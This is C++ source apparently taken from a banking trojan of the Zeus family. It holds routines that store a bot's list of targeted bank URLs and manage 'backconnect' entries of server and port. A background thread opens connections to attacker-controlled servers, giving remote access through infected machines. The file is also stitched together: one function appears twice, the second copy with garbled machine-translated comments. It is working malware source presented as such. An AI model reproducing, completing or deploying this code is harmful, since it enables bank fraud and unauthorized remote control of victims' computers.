void WINAPI bank::proc(void* p)
{
while(WaitForSingleObject(eventHandle, INFINITE) == WAIT_OBJECT_0)
{
BinStorage::STORAGE *config = LocalConfig::getCurrent();
if(config != NULL)
{
EnterCriticalSection(&csupd);
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
if(itemList != NULL && isValidList(itemList, itemListSize))
{
Mem::reallocEx(&urls, (itemListSize)*sizeof(char));
Mem::_copy(urls, itemList, itemListSize);
urlsSize = itemListSize;
}
LeaveCriticalSection(&csupd);
Mem::free(itemList);
Mem::free(config);
}
}
}
void bank::init()
{
InitializeCriticalSection(&csupd);
BinStorage::STORAGE *config = LocalConfig::getCurrent();
if(config != NULL)
{
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
if(itemList != NULL && isValidList(itemList, itemListSize))
{
if(urls != NULL) Mem::free(urls);
urls = (LPSTR)Mem::copyEx(itemList, itemListSize);
urlsSize = itemListSize;
}
Mem::free(itemList);
Mem::free(config);
}
WCHAR objectName[50];
Core::generateObjectName(Core::OBJECT_ID_BANK_LIST_ARRIVED, objectName, MalwareTools::KON_SESSION);
eventHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);
Core::generateObjectName(Core::OBJECT_ID_REPORTS_SENSETIVE, objectName, MalwareTools::KON_SESSION);
sensetiveHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);
CWA(kernel32, CreateThread)(NULL,0,(LPTHREAD_START_ROUTINE)proc,NULL,0, NULL);
}
bool bank::_addStatic(LPSTR url)
{
WORD newItemSize;
char newItem[256 + 1 + 1];
//Генирируем элемент.
{
BYTE urlLen = (BYTE)Str::_LengthA(url);
char *offset = newItem;
if(urlLen == 0)return false;
newItemSize = (urlLen + 1);
Str::_CopyA(offset, url, urlLen);
CWA(user32, CharLowerBuffA)(newItem, newItemSize);
}
//Открываем конфигурацию.
BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
if(config == NULL)return false;
//Получем список сущетвующих элементов.
bool ok = true;
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
//Если элемент существует, ищим клон.
if(isValidList(itemList, itemListSize))
{
LPSTR curItem = itemList;
do
{
//Проверяем доступно ли места больше чем, размер искомого элемента.
if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
//Сравниваем.
if(Mem::_compare(curItem, newItem, newItemSize) == 0)
{
WDEBUG0(WDDT_INFO, "Item already exists.");
ok = false;
break;
}
}
while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);
if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
{
Mem::_copy2(itemList + itemListSize - 1, newItem, newItemSize + 1);
ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
}
}
//Если элемент не найден, добавляем новый.
else
{
if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
else ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
}
Mem::free(itemList);
if(ok == false)
{
Mem::free(config);
config = NULL;
}
ok = LocalConfig::endReadWrite(config);
if(ok)PulseEvent(eventHandle);
return ok;
}
bool bank::_removeStatic(LPSTR url)
{
//Загружаем конфиг.
BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
if(config == NULL)return false;
//Получаем список элементов.
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
//Элементов нет.
if(itemList == NULL)
{
Mem::free(config);
return LocalConfig::endReadWrite(NULL);
}
//Проверяем правильность списка.
bool changed = false;
if(isValidList(itemList, itemListSize))
{
//Создаем копию списка для копирования в него, элементов не попавших под маску.
LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);
if(newItemList != NULL)
{
//Ишим элементы.
LPSTR curItem = itemList;
LPSTR offset = newItemList;
int len;
do
{
LPSTR curUrl = curItem;
if(Str::_matchExA(url, curUrl))
{
changed = true;
}
else
{
len = Str::_LengthA(curUrl);
Str::_CopyA(offset, curUrl, len);
offset += len + 1;
*offset = 0; //Завершающий байт мульти-строки.
}
}
while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);
if(changed == true)
{
if(offset == newItemList)offset--; //Почти аналог BinStorage::ITEMF_COMBINE_DELETE.
changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
}
Mem::free(newItemList);
}
}
Mem::free(itemList);
if(changed == false)
{
Mem::free(config);
config = NULL;
}
return LocalConfig::endReadWrite(config);
}
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
WORD newItemSize;
char newItem[256 * 3 + 3 + 1];
//Генирируем элемент.
{
BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
BYTE serverLen = (BYTE)Str::_LengthA(server);
BYTE serverPortLen = (BYTE)Str::_LengthA(serverPort);
char *offset = newItem;
if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;
newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);
Str::_CopyA(offset, servicePort, servicePortLen);
offset += servicePortLen + 1;
Str::_CopyA(offset, server, serverLen);
offset += serverLen + 1;
Str::_CopyA(offset, serverPort, serverPortLen);
offset += serverPortLen + 1;
*offset = 0; //Завершающий байт мульти-строки.
CWA(user32, CharLowerBuffA)(newItem, newItemSize);
}
//Открываем конфигурацию.
BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
if(config == NULL)return false;
//Получем список сущетвующих элементов.
bool ok = true;
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
//Если элемент существует, ищим клон.
if(isValidList(itemList, itemListSize))
{
LPSTR curItem = itemList;
do
{
//Проверяем доступно ли места больше чем, размер искомого элемента.
if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
//Сравниваем.
if(Mem::_compare(curItem, newItem, newItemSize) == 0)
{
WDEBUG0(WDDT_INFO, "Item already exists.");
ok = false;
break;
}
}
while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
{
Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
}
}
//Если элемент не найден, добавляем новый.
else
{
if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
else ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
}
Mem::free(itemList);
if(ok == false)
{
Mem::free(config);
config = NULL;
}
return LocalConfig::endReadWrite(config);
}
/*
Поток для для создания контроля бэконектов.
Return - 0.
*/
static DWORD WINAPI proc(void *)
{
CoreHook::disableFileHookerForCurrentThread(true);
HANDLE mutex = Core::waitForMutexOfObject(Core::OBJECT_ID_BACKCONNECT_CONTROL, MalwareTools::KON_GLOBAL);
if(mutex == NULL)
{
WDEBUG0(WDDT_ERROR, "Failed");
return 1;
}
CWA(kernel32, SetThreadPriority)(CWA(kernel32, GetCurrentThread)(), THREAD_PRIORITY_IDLE);
WDEBUG0(WDDT_INFO, "Started.");
#if(BO_DEBUG > 0)
if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 1000) == WAIT_TIMEOUT)
#else
if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 60 * 1000) == WAIT_TIMEOUT)
#endif
{
BinStorage::STORAGE *config = LocalConfig::getCurrent();
if(config != NULL)
{
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
if(itemList != NULL && isValidList(itemList, itemListSize))
{
LPSTR curItem = itemList;
do
{
LPSTR curServicePort = curItem;
LPSTR curServer = Str::_multiStringGetIndexA(curItem, 1);
LPSTR curServerPort = Str::_multiStringGetIndexA(curItem, 2);
//Генерируем мютекс.
HANDLE bcMutex = NULL;
{
DWORD nameParts[3];
nameParts[0] = Crypt::crc32Hash(curServicePort, Str::_LengthA(curServicePort));
nameParts[1] = Crypt::crc32Hash(curServer, Str::_LengthA(curServer));
nameParts[2] = Crypt::crc32Hash(curServerPort, Str::_LengthA(curServerPort));
WCHAR mutexName[7 + 3 * 8 + 1];
if(Str::_sprintfW(mutexName, sizeof(mutexName) / sizeof(WCHAR), L"Global\\%08X%08X%08X", nameParts[0], nameParts[1], nameParts[2]) == sizeof(mutexName) / sizeof(WCHAR) - 1)
{
WDEBUG1(WDDT_INFO, "mutexName=[%s]", mutexName);
bcMutex = Sync::_createUniqueMutex(&coreData.securityAttributes.saAllowAll, mutexName);
}
}
//Создаем дочерный поток.
if(bcMutex != NULL)
{
BCDATA *bcData = (BCDATA *)Mem::alloc(sizeof(BCDATA));
if(bcData != NULL)
{
bcData->servicePort = Str::_CopyExA(curServicePort, -1);
bcData->server = Str::_CopyExA(curServer, -1);
bcData->serverPort = Str::_CopyExA(curServerPort, -1);
bcData->mutex = bcMutex;
if(bcData->servicePort != NULL && bcData->server != NULL && bcData->serverPort != NULL)
{
if(Process::_createThread(512 * 1024, procConnection, bcData) > 0)continue;
}
Mem::free(bcData->servicePort);
Mem::free(bcData->server);
Mem::free(bcData->serverPort);
Mem::free(bcData);
}
Sync::_freeMutex(bcMutex);
}
}
while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
}
Mem::free(itemList);
Mem::free(config);
}
}
WDEBUG0(WDDT_INFO, "Stopped.");
Sync::_freeMutex(mutex);
return 0;
}
bool BackconnectBot::_removeStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
//Load config.
BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
if(config == NULL)return false;
//Get a list of items.
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
//No items.
if(itemList == NULL)
{
Mem::free(config);
return LocalConfig::endReadWrite(NULL);
}
//Check the correctness of the list.
bool changed = false;
if(isValidList(itemList, itemListSize))
{
//Create a copy of the list to be copied into it, the elements do not fall under the mask.
LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);
if(newItemList != NULL)
{
//Ishim elements.
LPSTR curItem = itemList;
LPSTR offset = newItemList;
int len;
do
{
LPSTR curServicePort = curItem;
LPSTR curServer = Str::_multiStringGetIndexA(curItem, 1);
LPSTR curServerPort = Str::_multiStringGetIndexA(curItem, 2);
if(Str::_matchExA(servicePort, curServicePort) && Str::_matchExA(server, curServer) && Str::_matchExA(serverPort, curServerPort))
{
changed = true;
}
else
{
len = Str::_LengthA(curServicePort);
Str::_CopyA(offset, curServicePort, len);
offset += len + 1;
len = Str::_LengthA(curServer);
Str::_CopyA(offset, curServer, len);
offset += len + 1;
len = Str::_LengthA(curServerPort);
Str::_CopyA(offset, curServerPort, len);
offset += len + 1;
*offset = 0; //The final multi-byte string.
}
}
while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
if(changed == true)
{
if(offset == newItemList)offset--; //Almost analog BinStorage:: ITEMF_COMBINE_DELETE.
changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
}
Mem::free(newItemList);
}
}
Mem::free(itemList);
if(changed == false)
{
Mem::free(config);
config = NULL;
}
return LocalConfig::endReadWrite(config);
}
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
WORD newItemSize;
char newItem[256 * 3 + 3 + 1];
//Geniriruem element.
{
BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
BYTE serverLen = (BYTE)Str::_LengthA(server);
BYTE serverPortLen = (BYTE)Str::_LengthA(serverPort);
char *offset = newItem;
if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;
newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);
Str::_CopyA(offset, servicePort, servicePortLen);
offset += servicePortLen + 1;
Str::_CopyA(offset, server, serverLen);
offset += serverLen + 1;
Str::_CopyA(offset, serverPort, serverPortLen);
offset += serverPortLen + 1;
*offset = 0; //The final multi-byte string.
CWA(user32, CharLowerBuffA)(newItem, newItemSize);
}
//Open the configuration.
BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
if(config == NULL)return false;
//Suschetvuet obtain a list of items.
bool ok = true;
DWORD itemListSize;
LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
//If the element exists ischim clone.
if(isValidList(itemList, itemListSize))
{
LPSTR curItem = itemList;
do
{
//Check whether the place is more than the size of the desired item.
if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
//Compare.
if(Mem::_compare(curItem, newItem, newItemSize) == 0)
{
WDEBUG0(WDDT_INFO, "Item already exists.");
ok = false;
break;
}
}
while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
{
Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
}
}
//If none are found, we add a new one.
else
{
if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
else ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
}
Mem::free(itemList);
if(ok == false)
{
Mem::free(config);
config = NULL;
}
return LocalConfig::endReadWrite(config);
}